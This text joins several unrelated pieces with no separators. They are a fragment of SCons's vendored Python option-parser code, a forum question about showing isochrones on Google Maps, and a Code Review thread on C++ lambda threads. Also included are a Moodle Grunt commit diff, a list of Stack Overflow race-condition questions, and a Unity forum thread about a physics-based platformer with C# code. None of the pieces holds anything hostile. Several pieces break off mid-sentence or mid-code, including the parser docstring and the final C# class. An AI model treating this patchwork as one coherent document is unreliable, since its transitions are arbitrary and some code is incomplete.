        self.largs = largs = []
        self.values = values

        try:
            stop = self._process_args(largs, rargs, values)
        except (BadOptionError, OptionValueError), err:
            self.error(err.msg)

        args = largs + rargs
        return self.check_values(values, args)

    def check_values (self, values, args):
        """
        check_values(values : Values, args : [string])
        -> (values : Values, args : [string])

        Check that the supplied option values and leftover arguments are
        valid.  Returns the option values and leftover arguments
        (possibly adjusted, possibly completely new -- whatever you
        like).  Default implementation just returns the passed-in
        values; subclasses may override as desired.
        """
        return (values, args)

    def _process_args (self, largs, rargs, values):
        """_process_args(largs : [string],
                         rargs : [string],
                         values : Values)

        Process command-line arguments and populate 'values', consuming
        options and arguments from 'rargs'.  If 'allow_interspersed_args' is
        false, stop at the first non-option argument.  If true, accumulate any
        interspersed non-option arguments in 'largs'.
        """
        while rargs:
            arg = rargs[0]
            # We handle bare "--" explicitly, and bare "-" is handled by the
            # standard arg handler since the short arg case ensures that the
            # len of the opt string is greater than 1.
            if arg == "--":
                del rargs[0]
                return
            elif arg[0:2] == "--":
                # process a single long option (possibly with value(s))
                self._process_long_opt(rargs, values)
            elif arg[:1] == "-" and len(arg) > 1:
                # process a cluster of short options (possibly with
                # value(s) for the last one only)
                self._process_short_opts(rargs, values)
            elif self.allow_interspersed_args:
                largs.append(arg)
                del rargs[0]
            else:
                return                  # stop now, leave this arg in rargs

        # Say this is the original argument list:
        # [arg0, arg1, ..., arg(i-1), arg(i), arg(i+1), ..., arg(N-1)]
        #                             ^
        # (we are about to process arg(i)).
        #
        # Then rargs is [arg(i), ..., arg(N-1)] and largs is a *subset* of
        # [arg0, ..., arg(i-1)] (any options and their arguments will have
        # been removed from largs).
        #
        # The while loop will usually consume 1 or more arguments per pass.
        # If it consumes 1 (eg. arg is an option that takes no arguments),
        # then after _process_arg() is done the situation is:
        #
        #   largs = subset of [arg0, ..., arg(i)]
        #   rargs = [arg(i+1), ..., arg(N-1)]
        #
        # If allow_interspersed_args is false, largs will always be
        # *empty* -- still a subset of [arg0, ..., arg(i-1)], but
        # not a very interesting subset!

    def _match_long_opt (self, opt):
        """_match_long_opt(opt : string) -> string

        Determine which long option string 'opt' matches, ie. which one
        it is an unambiguous abbrevation for.  Raises BadOptionError if
        'opt' doesn't unambiguously match any long option string.
        """
        return _match_abbrev(opt, self._long_opt)

    def _process_long_opt (self, rargs, values):
        arg = rargs.pop(0)

        # Value explicitly attached to arg?  Pretend it's the next
        # argument.
        if "=" in arg:
            (opt, next_arg) = string.split(arg,"=", 1)
            rargs.insert(0, next_arg)
            had_explicit_value = 1
        else:
            opt = arg
            had_explicit_value = 0

        opt = self._match_long_opt(opt)
        option = self._long_opt[opt]
        if option.takes_value():
            nargs = option.nargs
            if len(rargs) < nargs:
                if nargs == 1:
                    self.error("%s option requires a value" % opt)
                else:
                    self.error("%s option requires %d values"
                               % (opt, nargs))
            elif nargs == 1:
                value = rargs.pop(0)
            else:
                value = tuple(rargs[0:nargs])
                del rargs[0:nargs]

        elif had_explicit_value:
            self.error("%s option does not take a value" % opt)

        else:
            value = None

        option.process(opt, value, values, self)

    def _process_short_opts (self, rargs, values):
        arg = rargs.pop(0)
        stop = 0
        i = 1
        for ch in arg[1:]:
            opt = "-" + ch
            option = self._short_opt.get(opt)
            i = i+1                     # we have consumed a character

            if not option:
                self.error("no such option: %s" % opt)
            if option.takes_value():
                # Any characters left in arg?  Pretend they're the
                # next arg, and stop consuming characters of arg.
                if i < len(arg):
                    rargs.insert(0, arg[i:])
                    stop = 1

                nargs = option.nargs
                if len(rargs) < nargs:
                    if nargs == 1:
                        self.error("%s option requires a value" % opt)
                    else:
                        self.error("%s option requires %s values"
                                   % (opt, nargs))
                elif nargs == 1:
                    value = rargs.pop(0)
                else:
                    value = tuple(rargs[0:nargs])
                    del rargs[0:nargs]

            else:                       # option doesn't take a value
                value = None

            option.process(opt, value, values, self)

            if stop:
                break


    # -- Output/error methods ------------------------------------------

    def error (self, msg):
        """error(msg : string)

        Print a usage message incorporating 'msg' to stderr and exit.
        If you override this in a subclass, it should not return -- it
        should either exit or raise an exception.
        """
        self.print_usage(sys.stderr)
        sys.stderr.write("\nSCons error: %s\n" % msg)
        sys.exit(2)

    def print_usage (self, file=None):
        """print_usage(file : file = stdout)

        Print the usage message for the current program (self.usage) to
        'file' (default stdout).  Any occurence of the string "%prog" in
        self.usage is replaced with the name of the current program
        (basename of sys.argv[0]).  Does nothing if self.usage is empty
        or not defined.
        """
        if file is None:
            file = sys.stdout
        if self.usage:
            usage = string.replace(self.usage,"%prog", get_prog_name())
            file.write(usage + "\n")

    def print_version (self, file=None):
        """print_version(file : file = stdout)

        Print the version message for this program (self.version) to
        'file' (default stdout).  As with print_usage(), any occurence
        of "%prog" in self.version is replaced by the current program's
        name.  Does nothing if self.version is empty or undefined.
        """
        if file is None:
            file = sys.stdout
        if self.version:
            version = string.replace(self.version,"%prog", get_prog_name())
            file.write(version+"\n")

    def print_help (self, file=None):
        """print_help(file : file = stdout)

        Print an extended help message, listing all options and any
        help text provided with them, to 'file' (default stdout).
        """
        # SCons:  don't import wrap_text from distutils, use the
        # copy we've included below, so we can avoid being dependent
        # on having the right version of distutils installed.
        #from distutils.fancy_getopt import wrap_text

        if file is None:
            file = sys.stdout

        self.print_usage(file)

        # The help for each option consists of two parts:
        #   * the opt strings and metavars
        #     eg. ("-x", or "-fFILENAME, --file=FILENAME")
        #   * the user-supplied help string
        #     eg. ("turn on expert mode", "read data from FILENAME")
        #
        # If possible, we write both of these on the same line:
        #   -x      turn on expert mode
        #
        # But if the opt string list is too long, we put the help
        # string on a second line, indented to the same column it would
        # start in if it fit on the first line.
        #   -fFILENAME, --file=FILENAME
        #           read data from FILENAME

        file.write("Options:\n")
        width = 78                      # assume 80 cols for now

        option_help = []                # list of (string, string) tuples
        lengths = []

        for option in self.option_list:
            takes_value = option.takes_value()
            if takes_value:
                metavar = option.metavar or string.upper(option.dest)

            opts = []                   # list of "-a" or "--foo=FILE" strings
            if option.help is SUPPRESS_HELP:
                continue

            if takes_value:
                for sopt in option._short_opts:
                    opts.append(sopt + ' ' + metavar)
                for lopt in option._long_opts:
                    opts.append(lopt + "=" + metavar)
            else:
                for opt in option._short_opts + option._long_opts:
                    opts.append(opt)

            opts = string.join(opts,", ")
            option_help.append((opts, option.help))
            lengths.append(len(opts))

        max_opts = min(max(lengths), 26)

        for (opts, help) in option_help:
            # how much to indent lines 2 .. N of help text
            indent_rest = 2 + max_opts + 2
            help_width = width - indent_rest

            if len(opts) > max_opts:
                opts = "  " + opts + "\n"
                indent_first = indent_rest
            else:                       # start help on same line as opts
                opts = "  %-*s  " % (max_opts, opts)
                indent_first = 0

            file.write(opts)

            if help:
                help_lines = wrap_text(help, help_width)
                file.write( "%*s%s\n" % (indent_first, "", help_lines[0]))
                for line in help_lines[1:]:
                    file.write("  %*s%s\n" % (indent_rest, "", line))
            elif opts[-1] != "\n":
                file.write("\n")

# class OptionParser


def _match_abbrev (s, wordmap):
    """_match_abbrev(s : string, wordmap : {string : Option}) -> string

    Return the string key in 'wordmap' for which 's' is an unambiguous
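For readers wondering how this parser is driven: the vendored module above is an early copy of Greg Ward's Optik, whose interface later entered the Python standard library as optparse. A minimal usage sketch against that stdlib descendant (the `-f`/`-v` option names below are invented for illustration, not taken from SCons):

```python
# Minimal use of the OptionParser interface via the stdlib descendant,
# optparse. The options defined here are illustrative only.
from optparse import OptionParser

parser = OptionParser(usage="usage: %prog [options]")
parser.add_option("-f", "--file", dest="filename",
                  help="read data from FILENAME", metavar="FILENAME")
parser.add_option("-v", "--verbose", action="store_true",
                  dest="verbose", default=False)

# parse_args() returns (values, leftover_args), the same pair shape as
# the vendored parse_args() above.
options, args = parser.parse_args(["-f", "out.txt", "extra"])
```

Here `options.filename` holds "out.txt" and `args` holds the leftover positional argument list.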
Draw isochrones in Google Maps

Hello sirs, still the same problem, but with progress! I'm not sure whether I can draw my isochrones on a Google Maps map. Can you confirm that this is possible, or is it only Leaflet that accepts isochrone drawings? Thanks.

Hey, what do you mean when you state that? Could you elaborate? Are you trying to overlay any map from google.com/maps with a rendering of an isochrone? Are you trying to use the Maps JavaScript API? Do you attempt anything else? I'd assume that this is not a problem stemming from the isochrone returned by the openrouteservice, though - if it is, please let us know!

Best regards
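One way to bridge the two, sketched under the assumption that the isochrone arrives as a standard GeoJSON FeatureCollection of Polygon features (which is how openrouteservice returns them); the helper name and the sample coordinates below are made up for illustration:

```javascript
// Convert each polygon's outer ring from GeoJSON [lng, lat] pairs into
// the {lat, lng} literals that the Maps JavaScript API expects, e.g. for
// new google.maps.Polygon({paths: ...}).
function isochronePaths(featureCollection) {
  return featureCollection.features
    .filter(function (f) { return f.geometry.type === 'Polygon'; })
    .map(function (f) {
      // Outer ring only (coordinates[0]); holes are ignored in this sketch.
      return f.geometry.coordinates[0].map(function (pt) {
        return { lat: pt[1], lng: pt[0] };
      });
    });
}
```

In the browser you would then draw each ring on the map, e.g. `new google.maps.Polygon({ paths: paths[0], map: map })`, or hand the whole FeatureCollection to `map.data.addGeoJson(...)` directly.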
Code Review Stack Exchange is a question and answer site for peer programmer code reviews.

I've created this very small header that allows direct creation of threads from lambdas. I can't find anything else similar on the net, so I want to know whether there are any problems with this that I have not thought of. It is based on tinythread++, but can easily be altered to work with pthread or other threading libraries that can take a void (void*) (or void* (void*)) function and a void* argument for the function to start a thread. Note that this implementation assumes limited C++0x/11 support, i.e. just lambdas.

#include "tinythread.h"

namespace lthread
{
    /// implementation details - do not use directly
    namespace impl
    {
        template<typename Func>
        void use_function_once(void* _f)
        {
            const Func* f = (const Func*)_f;
            (*f)();
            delete f; // delete - no longer needed
        }

        template<typename Func>
        void use_function(void* _f)
        {
            const Func* f = (const Func*)_f;
            (*f)();
        }
    }

    /// Creates a thread based on a temporary function.
    /// Copies the function onto the heap for use outside of the local scope, removes from the heap when finished.
    template<typename Func>
    tthread::thread* new_thread(const Func& f)
    {
        Func* _f = new Func(f); // copy to heap
        return new tthread::thread(&impl::use_function_once<Func>,(void*)_f);
    }

    /// Creates a thread based on a guaranteed persistent function.
    /// Does not copy or delete the function.
    template<typename Func>
    tthread::thread* new_thread(const Func* f)
    {
        return new tthread::thread(&impl::use_function<Func>, (void*)f);
    }
}

Example usage:

size_t a = 1;
size_t b = 0;
tthread::thread* t = lthread::new_thread([&] ()
{
    std::cout << "I'm in a thread!\n";
    std::cout << "'a' is " << a << std::endl;
    b = 1;
});
t->join();
std::cout << "'b' is " << b << std::endl;
delete t;

What if (*f)(); should throw? You get a leak.
– user1095108 Aug 3 '13 at 23:17

@user1095108 Good point. – Dylan Aug 5 '13 at 10:39

1 Answer

1. Surely you can just use std::function<void()> instead of templating on the function type?

2. Capturing by reference can go horribly wrong. It's not a bug in your library, just an observation:

tthread::thread* startthread(size_t a, size_t b)
{
    return lthread::new_thread([&] ()
    {
        std::cout << "I'm in a thread!\n";
        std::cout << "'a' is " << a << std::endl;
        b = 1;
    });
}

int main()
{
    tthread::thread *t = startthread(1,2);
    t->join();
    delete t;
}

3. use_function_once is vulnerable to the function call throwing an exception: you should probably assign it to a smart pointer before calling, and lose the explicit delete.

4. That overload of new_thread also has a problem if either new or tthread::thread can throw: it will leak the heap-allocated Func. You can fix this with a smart pointer too.

I have already made a change to the code - the two new_thread functions now have different names - the by-reference version was capturing the pointer argument instead of the pointer version and thus didn't compile as intended. – Dylan Sep 19 '12 at 16:59

Also, I am fully aware of the point you are making with that snippet, but that also applies to any other deferred running of a lambda function. Users should be aware of this when using by-reference lambdas in other situations. – Dylan Sep 19 '12 at 17:01
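Points 1, 3 and 4 of the answer can be addressed together. The sketch below assumes std::thread standing in for tthread::thread (an assumption - tinythread's thread takes the same function-pointer-plus-void* pair), uses std::function<void()> to avoid templating, and uses std::unique_ptr so the heap copy is freed both when the callable throws and when thread construction fails; run_demo and its return value are illustrative only:

```cpp
#include <functional>
#include <memory>
#include <thread>

namespace lthread {

// Trampoline with the void(void*) shape the original header needs.
// The heap copy is owned by a unique_ptr, so it is deleted even if
// the callable throws (fixes point 3).
inline void run_function_once(void* p) {
    std::unique_ptr<std::function<void()>> f(
        static_cast<std::function<void()>*>(p));
    (*f)();
}

inline std::thread* new_thread(const std::function<void()>& f) {
    std::unique_ptr<std::function<void()>> heap_f(
        new std::function<void()>(f));
    // If thread construction throws, heap_f still owns the copy and
    // deletes it (fixes point 4); on success, ownership passes to the
    // trampoline and we just abandon our handle.
    std::thread* t = new std::thread(&run_function_once,
                                     static_cast<void*>(heap_f.get()));
    heap_f.release();
    return t;
}

} // namespace lthread

// Tiny self-check: the lambda really runs on the other thread.
inline int run_demo() {
    int b = 0;
    std::thread* t = lthread::new_thread([&b]() { b = 3; });
    t->join();
    delete t;
    return b;
}
```

With full C++11 available this machinery largely disappears, since std::thread accepts a lambda directly; the trampoline shape only matters for the C-style APIs the question targets.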
Permalink

MDL-49817 grunt: handle multiple watched files changed at once

Includes multiple changes to the shifter task to simplify and support this:

* Use grunt.file for shifter yui 'module' detection rather than our own 70 line function
* Use grunt.util.spawn rather than our own exec for shifter
* Improve behaviour on various yui subdirectories

We have to add the 'async' dependency to npm because we are running multiple async operations in the single task. We use async.eachSeries to run each shifter job sequentially (else the output would be unreadable when running async). We also run shifter in non-recursive mode on the module directory so it's not building everything (thanks to Ryan for pointing this out!)

danpoltawski committed Jan 21, 2016
1 parent 0b777a0, commit 1aa454eda43051eae45953dab0bca24b21e24f70
Showing with 87 additions and 128 deletions:
+67 −123 Gruntfile.js
+19 −5 npm-shrinkwrap.json
+1 −0 package.json

Gruntfile.js

@@ -25,7 +25,6 @@ module.exports = function(grunt) {
    var path = require('path'),
        fs = require('fs'),
        tasks = {},
        cwd = process.env.PWD || process.cwd(),
        inAMD = path.basename(cwd) == 'amd';

@@ -92,55 +91,62 @@ module.exports = function(grunt) {
            files: ['**/yui/src/**/*.js'],
            tasks: ['shifter']
        },
    },
    shifter: {
        options: {
            recursive: true,
            paths: [cwd]
        }
    }
});

/**
 * Shifter task. Is configured with a path to a specific file or a directory,
 * in the case of a specific file it will work out the right module to be built.
 *
 * Note that this task runs the invidiaul shifter jobs async (becase it spawns
 * so be careful to to call done().
 */
tasks.shifter = function() {
    var exec = require('child_process').spawn,
    var async = require('async'),
        done = this.async(),
        args = [],
        options = {
            recursive: true,
            watch: false,
            walk: false,
            module: false
        },
        shifter;
    options = grunt.config('shifter.options');

    grunt.log.ok("Running shifter on " + cwd);
    // Run the shifter processes one at a time to avoid confusing output.
    async.eachSeries(options.paths, function (src, filedone) {
        var args = [];
        args.push( path.normalize(__dirname + '/node_modules/shifter/bin/shifter'));

        // Always ignore the node_modules directory.
        args.push('--excludes', 'node_modules');

        // Determine the most appropriate options to run with based upon the current location.
        if (path.basename(cwd) === 'src') {
        // Detect whether we're in a src directory.
        if (grunt.file.isMatch('**/yui/**/*.js', src)) {
            // When passed a JS file, build our containing module (this happen with
            // watch).
            grunt.log.debug('Shifter passed a specific JS file');
            src = path.dirname(path.dirname(src));
            options.recursive = false;
        } else if (grunt.file.isMatch('**/yui/src', src)) {
            // When in a src directory --walk all modules.
            grunt.log.debug('In a src directory');
            args.push('--walk');
            options.walk = true;
        } else if (path.basename(path.dirname(cwd)) === 'src') {
            // Detect whether we're in a module directory.
            options.recursive = false;
        } else if (grunt.file.isMatch('**/yui/src/*', src)) {
            // When in module, only build our module.
            grunt.log.debug('In a module directory');
            options.module = true;
        }

        if (grunt.option('watch')) {
            if (!options.walk && !options.module) {
                grunt.fail.fatal('Unable to watch unless in a src or module directory');
            }
            // It is not advisable to run with recursivity and watch - this
            // leads to building the build directory in a race-like fashion.
            grunt.log.debug('Detected a watch - disabling recursivity');
            options.recursive = false;
            args.push('--watch');
        } else if (grunt.file.isMatch('**/yui/src/*/js', src)) {
            // When in module src, only build our module.
            grunt.log.debug('In a source directory');
            src = path.dirname(src);
            options.recursive = false;
        }

        if (options.recursive) {
            args.push('--recursive');
        if (grunt.option('watch')) {
            grunt.fail.fatal('The --watch option has been removed, please use `grunt watch` instead');
        }

        // Always ignore the node_modules directory.
        args.push('--excludes', 'node_modules');

        // Add the stderr option if appropriate
        if (grunt.option('verbose')) {
            args.push('--lint-stderr');

@@ -152,19 +158,17 @@
        var execShifter = function() {
            shifter = exec("node", args, {
                cwd: cwd,
                stdio: 'inherit',
                env: process.env
            });

            // Tidy up after exec.
            shifter.on('exit', function (code) {
        grunt.log.ok("Running shifter on " + src);
        grunt.util.spawn({
            cmd: "node",
            args: args,
            opts: {cwd: src, stdio: 'inherit', env: process.env}
        }, function (error, result, code) {
            if (code) {
                grunt.fail.fatal('Shifter failed with code: ' + code);
            } else {
                grunt.log.ok('Shifter build complete.');
                done();
                filedone();
            }
        });

@@ -174,79 +178,15 @@
            execShifter();
        } else {
            // Check that there are yui modules otherwise shifter ends with exit code 1.
            var found = false;
            var hasYuiModules = function(directory, callback) {
                fs.readdir(directory, function(err, files) {
                    if (err) {
                        return callback(err, null);
                    }

                    // If we already found a match there is no need to continue scanning.
                    if (found === true) {
                        return;
                    }

                    // We need to track the number of files to know when we return a result.
                    var pending = files.length;

                    // We first check files, so if there is a match we don't need further
                    // async calls and we just return a true.
                    for (var i = 0; i < files.length; i++) {
                        if (files[i] === 'yui') {
                            return callback(null, true);
                        }
                    }

                    // Iterate through subdirs if there were no matches.
                    files.forEach(function (file) {
                        var p = path.join(directory, file);
                        var stat = fs.statSync(p);
                        if (!stat.isDirectory()) {
                            pending--;
                        } else {
                            // We defer the pending-1 until we scan the whole dir and subdirs.
                            hasYuiModules(p, function(err, result) {
                                if (err) {
                                    return callback(err);
                                }

                                if (result === true) {
                                    // Once we get a true we notify the caller.
                                    found = true;
                                    return callback(null, true);
                                }

                                pending--;
                                if (pending === 0) {
                                    // Notify the caller that the whole dir has been scaned and there are no matches.
                                    return callback(null, false);
                                }
                            });
                        }

                        // No subdirs here, otherwise the return would be deferred until all subdirs are scanned.
                        if (pending === 0) {
                            return callback(null, false);
                        }
                    });
                });
            };

            hasYuiModules(cwd, function(err, result) {
                if (err) {
                    grunt.fail.fatal(err.message);
                }

                if (result === true) {
                    execShifter();
                } else {
                    grunt.log.ok('No YUI modules to build.');
                    done();
                }
            });
        if (grunt.file.expand({cwd: src}, '**/yui/src/**/*.js').length > 0) {
            args.push('--recursive');
            execShifter();
        } else {
            grunt.log.ok('No YUI modules to build.');
            filedone();
        }
    }, done);
};

tasks.startup = function() {
@@ -263,17 +203,21 @@
    }
};

// On watch, we dynamically modify config to build only affected files. This
// method is slightly complicated to deal with multiple changed files at once (copied
// from the grunt-contrib-watch readme).
var changedFiles = Object.create(null);
var onChange = grunt.util._.debounce(function() {
    var files = Object.keys(changedFiles);
    grunt.config('jshint.amd.src', files);
    grunt.config('uglify.amd.files', [{ expand: true, src: files, rename: uglify_rename }]);
    grunt.config('shifter.options.paths', files);
    changedFiles = Object.create(null);
}, 200);

// On watch, we dynamically modify config to build only affected files.
grunt.event.on('watch', function(action, filepath) {
    grunt.config('jshint.amd.src', filepath);
    grunt.config('uglify.amd.files', [{ expand: true, src: filepath, rename: uglify_rename }]);
    if (filepath.match('yui')) {
        // Set the cwd to the base directory for yui modules which have changed.
        cwd = filepath.split(path.sep + 'yui' + path.sep + 'src').shift();
    } else {
        cwd = process.env.PWD || process.cwd();
    }
    changedFiles[filepath] = action;
    onChange();
});

// Register NPM tasks.

npm-shrinkwrap.json
(Some generated files are not rendered by default.)

package.json

@@ -3,6 +3,7 @@
    "private": true,
    "description": "Moodle",
    "devDependencies": {
        "async": "^1.5.2",
        "grunt": "0.4.5",
        "grunt-contrib-jshint": "0.11.3",
        "grunt-contrib-less": "1.1.0",

0 comments on commit 1aa454e
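The commit message's reliance on async.eachSeries - run one shifter job at a time, and fire a final callback once when all are done (or early, on error) - can be illustrated with a stripped-down stand-in. This is not the real 'async' library, just a sketch of the contract it provides:

```javascript
// Minimal eachSeries: the worker for item i+1 only starts after item i's
// worker has called its callback; the final callback runs exactly once.
function eachSeries(items, worker, done) {
  var i = 0;
  function next(err) {
    if (err || i === items.length) { return done(err); }
    worker(items[i++], next);
  }
  next();
}

// e.g. running one "shifter job" per yui source directory at a time:
var order = [];
eachSeries(['mod1', 'mod2'], function (src, filedone) {
  order.push(src);   // spawn shifter for src here, then...
  filedone();        // ...signal completion so the next job starts
}, function (err) {
  if (!err) { order.push('done'); }
});
```

Running the jobs strictly in series is what keeps shifter's interleaved stdout readable, which is exactly the reason the commit message gives for choosing eachSeries over a parallel iterator.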
All Questions

638 votes, 17 answers, 374279 views
What is a race condition?
When writing multi-threaded applications, one of the most common problems experienced are race conditions. My questions to the community are: What is a race condition? How do you detect them? How ...

36 votes, 2 answers, 15204 views
SQL Server Process Queue Race Condition
I have an order queue that is accessed by multiple order processors through a stored procedure. Each processor passes in a unique ID which is used to lock the next 20 orders for its own use. The stor...

33 votes, 2 answers, 10654 views
Atomic UPDATE .. SELECT in Postgres
I'm building a queuing mechanism of sorts. There are rows of data that need processing, and a status flag. I'm using an update .. returning clause to manage it: UPDATE stuff SET computed = 'working' ...

21 votes, 4 answers, 46712 views
MySQL INSERT IF (custom if statements)
First, here's the concise summary of the question: Is it possible to run an INSERT statement conditionally? Something akin to this: IF(expression) INSERT... Now, I know I can do this with a stored...

19 votes, 3 answers, 8825 views
How to make sure there is no race condition in MySQL database when incrementing a field?
How to prevent a race condition in MySQL database when two connections want to update the same record? For example, connection 1 wants to increase "tries" counter. And the second connection wants to ...

23 votes, 4 answers, 10510 views
Do database transactions prevent race conditions?
It's not entirely clear to me what transactions in database systems do. I know they can be used to rollback a list of updates completely (e.g. deduct money on one account and add it to another), but i...

18 votes, 1 answer, 3233 views
Can we have race conditions in a single-thread program?
You can find on here a very good explanation about what is a race condition. I have seen recently many people making confusing statements about race conditions and threads. I have learned that race ...
23 votes 4answers 1603 views Why would try/finally rather than a "using" statement help avoid a race condition? This question relates to a comment in another posting here: Cancelling an Entity Framework Query I will reproduce the code example from there for clarity: var thread = new Thread((param) => ... 2 votes 3answers 211 views Hidden threads in Javascript/Node that never execute user code: is it possible, and if so could it lead to an arcane possibility for a race condition? See bottom of question for an update, based on comments/answers: This question is really about the possibility of hidden threads that do not execute callbacks. I have a question about a potential a... 29 votes 6answers 11532 views Race conditions in django Here is a simple example of a django view with a potential race condition: # myapp/views.py from django.contrib.auth.models import User from my_libs import calculate_points def add_points(request): ... Previous Next
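Several of the questions above (the MySQL "tries" counter, the Postgres queue) reduce to the same lost-update race: two clients read a value, increment it locally, and write it back. Here is a minimal sketch in Python using a toy in-memory counter (not an actual database), with the worst-case interleaving spelled out deterministically by hand:

```python
import threading

class Counter:
    def __init__(self):
        self.value = 0
        self.lock = threading.Lock()

def unsafe_schedule(counter):
    # Simulate the worst-case interleaving explicitly:
    # both clients read the counter before either writes it back.
    read_a = counter.value          # client A reads tries = 0
    read_b = counter.value          # client B reads tries = 0
    counter.value = read_a + 1      # client A writes tries = 1
    counter.value = read_b + 1      # client B writes tries = 1 (A's update is lost)

def safe_increment(counter):
    # Holding a lock makes the read-modify-write atomic,
    # so no update can be lost regardless of thread timing.
    with counter.lock:
        counter.value += 1

c1 = Counter()
unsafe_schedule(c1)
print(c1.value)  # 1 — two increments ran, but one was lost

c2 = Counter()
threads = [threading.Thread(target=safe_increment, args=(c2,)) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(c2.value)  # 2 — both increments kept
```

The lock plays the role that a row lock (e.g. SELECT ... FOR UPDATE) or a single atomic UPDATE tries = tries + 1 statement plays in the database-flavoured answers.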
New Physics-based Action Game
Discussion in 'Works In Progress - Archive' started by hidingspot, Sep 16, 2014.

1. hidingspot
Joined: Apr 27, 2011
Posts: 87

A new project from SuperChop Games. For now, we're calling it proto-1. We'll be sharing Unity-specific details on this thread, as well as more general discussions on TIGSource here, and our blog here. For anyone who is interested, please share your thoughts. Links to playable builds coming soon!

Recent screenshot:

Key Features
- Completely physics-based
- 2d action platformer
- Procedural weapon system
- Roguey-like-ish-type

Platforms
Yes - PC - Mac
Probably - Linux
Maybe - Console - PS Vita

Last edited: Oct 13, 2014

2. marserMD
Joined: Aug 29, 2014
Posts: 191

Hi. As far as I understand, you can't control the character directly. If so, it's really cool. I've had a similar idea for an infinite runner. Maybe my plugin would be helpful for your explosions (it will be free, so it's not an advertisement).

3. hidingspot
Joined: Apr 27, 2011
Posts: 87

You can control the character directly, but it's within the context of the physics engine. So, telling the character to move right applies a physics force in the right direction. At the end of the day, the goal is tight controls, but within the context of the physics engine, so that realistic dynamics affect every part of the gameplay (character movement included).

4.
hidingspot
Joined: Apr 27, 2011
Posts: 87

Thought I'd share our implementation of a simple sandbox tool I created early on (well, it's still very early) in development. It's great for testing out scenarios and scene changes on the fly, from right within a running build of the game. First here's a little clip:

The main piece of code is actually quite simple. It's called ObjectPlacer, and it does just that:

Code (CSharp):
using UnityEngine;

public class ObjectPlacer : MonoBehaviour
{
    /// <summary>
    /// Possible prefabs to be selected randomly
    /// </summary>
    public GameObject[] prefabs;
    GameObject current;

    void Update ()
    {
        if (prefabs.Length < 1) {
            return;
        }
        // recreate a prefab to place if there is none
        if (current == null) {
            ReCreate ();
        }
        current.transform.position = transform.position;
        if (Input.GetMouseButtonDown (0)) {
            PlaceObject (current);
        }
    }

    public void ReCreate ()
    {
        // handle when Unity UI calls methods in edit mode
        if (!Application.isPlaying || !enabled || !gameObject.activeInHierarchy) {
            return;
        }
        if (current != null) {
            Destroy (current);
        }
        current = CreateObject (prefabs [Random.Range (0, prefabs.Length)]);
    }

    virtual protected void PlaceObject (GameObject go)
    {
        // let go of current object, setting its position
        // and signaling for a new one to be created
        current = null;
    }

    virtual protected GameObject CreateObject (GameObject fromPrefab)
    {
        return Instantiate (fromPrefab) as GameObject;
    }

    void OnDisable ()
    {
        if (current != null) {
            Destroy (current);
        }
    }
}

For each type of object/prefab you want to be able to place in the scene, you'd have an ObjectPlacer object in the hierarchy which points to that prefab (or multiple to pull randomly):

All the Unity UI does is set which ObjectPlacer is active/inactive on button toggle:

One important note: you want to make sure that object placers aren't active while hovering over buttons. Otherwise, any time you select a new button, it will create any existing selected object at the location of that button. After some fumbling with the Rect class, I realized a much simpler way to achieve this. The new Unity UI automatically swallows events based on the GraphicRaycaster behaviour which is attached to the canvas. All we need to do is create a "placement area" panel/image behind the rest of the GUI which turns the sandbox tools' parent on/off on pointer enter/exit. Though it is fully transparent, the image component is required to trigger the enter/exit events:

Hope you find this useful!

Last edited: Sep 30, 2014

5. hidingspot
Joined: Apr 27, 2011
Posts: 87

Here's a first look at the door that transports the player between its cozy home base and the big bad game world. The idea is that between levels the player will be able to travel to his/her safe home, wherein powerups, customizations, and other fun stuff can be configured.

6. hidingspot
Joined: Apr 27, 2011
Posts: 87

Oh dear, they're getting smarter... Little ground enemies now traverse and climb over obstacles towards their destination. In this case, toward an unsuspecting player character. Going to be traveling for several days, but I'll try to find time to write about the AI system. It's pretty cool.

7. Myhijim
Joined: Jun 15, 2012
Posts: 1,148

Surprised this hasn't been given much attention, it looks like a sweet little side-scroller. Those little things freak me out and the AI behind them seems solid.

8.
stoilcho
Joined: Sep 8, 2014
Posts: 30

I'm digging the Geometry Wars stripped-down graphics (proper name for those is ?) and the ticks are looking awesomely creepy. I will totally provide detailed feedback once we have a web demo. I do have a question for OP and I'm sorry for watering down the thread, but OP stated: "So, telling the character to move right applies a physics force in the right direction." I'm working on a top-down game that is not really physics-based but I'm still using addForce and stuff like that to move the characters, projectiles and stuff around. Is that somehow bad practice if a game is not meant to be 'physics-based'? Thanks guys

9. hidingspot
Joined: Apr 27, 2011
Posts: 87

I wouldn't say it's bad practice, as long as you're happy with the results. Most of the time, with character controllers especially, you'll see people set rigidbody velocity directly. Doing it that way gives somewhat more predictable results (you specify just how fast and in what direction the character moves). In my case, I wanted that degree of unpredictability, so that interesting physics interactions could bubble up emergently. Like in this early test where the player grabs a flying enemy and drags it to the ground. The only part of that interaction that was coded was the grab:

10. hidingspot
Joined: Apr 27, 2011
Posts: 87

Thanks, I'll definitely try to post about the AI in the next week. I'll include a gif of the load test I did with a whole bunch of those little creepers on the screen at once.

11. hidingspot
Joined: Apr 27, 2011
Posts: 87

Using Mecanim for AI State Machine

I had begun using a simple state machine codebase from a previous project, but decided to try using Mecanim as a generic state machine. Having a visual state tool in the editor is a big aid to tackling complex AI.
After seeing the announcement that Unity 5 will support state machine behaviours, I thought it would be nice to implement a wrapper solution in the meantime, which would not only allow the use of Mecanim state behaviours, but also easy migration when Unity 5 becomes available.

The main class is called "MecanimWrapper". It associates Mecanim states with Unity behaviours, and sets those behaviours enabled based on the active Mecanim state. You can see that the names of the state behaviours listed in the Mecanim Wrapper match those seen in the screenshot of the Mecanim Animator state machine. So, when the state machine idle state starts, the AiGroundIdle script is enabled. When the state switches to chase, the AiGroundIdle script is disabled and the AiGroundChase script is enabled. All the while, the Animator window gives a clear view of which state is active. Very handy for debugging and visualizing AI.

So here's really the only thing you need to try it out yourself, the MecanimWrapper class (AiMecanimWrapper above is a basic extension of that class).

Code (CSharp):
using UnityEngine;
using System.Collections.Generic;

public class MecanimWrapper : MonoBehaviour
{
    public Animator animator;
    public StateBehaviour[] stateBehaviours;
    static int CURRENT_STATE_TIME = Animator.StringToHash ("currentStateTime");
    Dictionary<int, Behaviour[]> behaviourCache;
    int currentState;
    float _currentStateTime;

    float currentStateTime {
        get {
            return _currentStateTime;
        }
        set {
            _currentStateTime = value;
            animator.SetFloat (CURRENT_STATE_TIME, _currentStateTime);
        }
    }

    void Start ()
    {
        behaviourCache = new Dictionary<int, Behaviour[]> ();
        foreach (StateBehaviour item in stateBehaviours) {
            int nameHash = Animator.StringToHash (item.layer + "." + item.state);
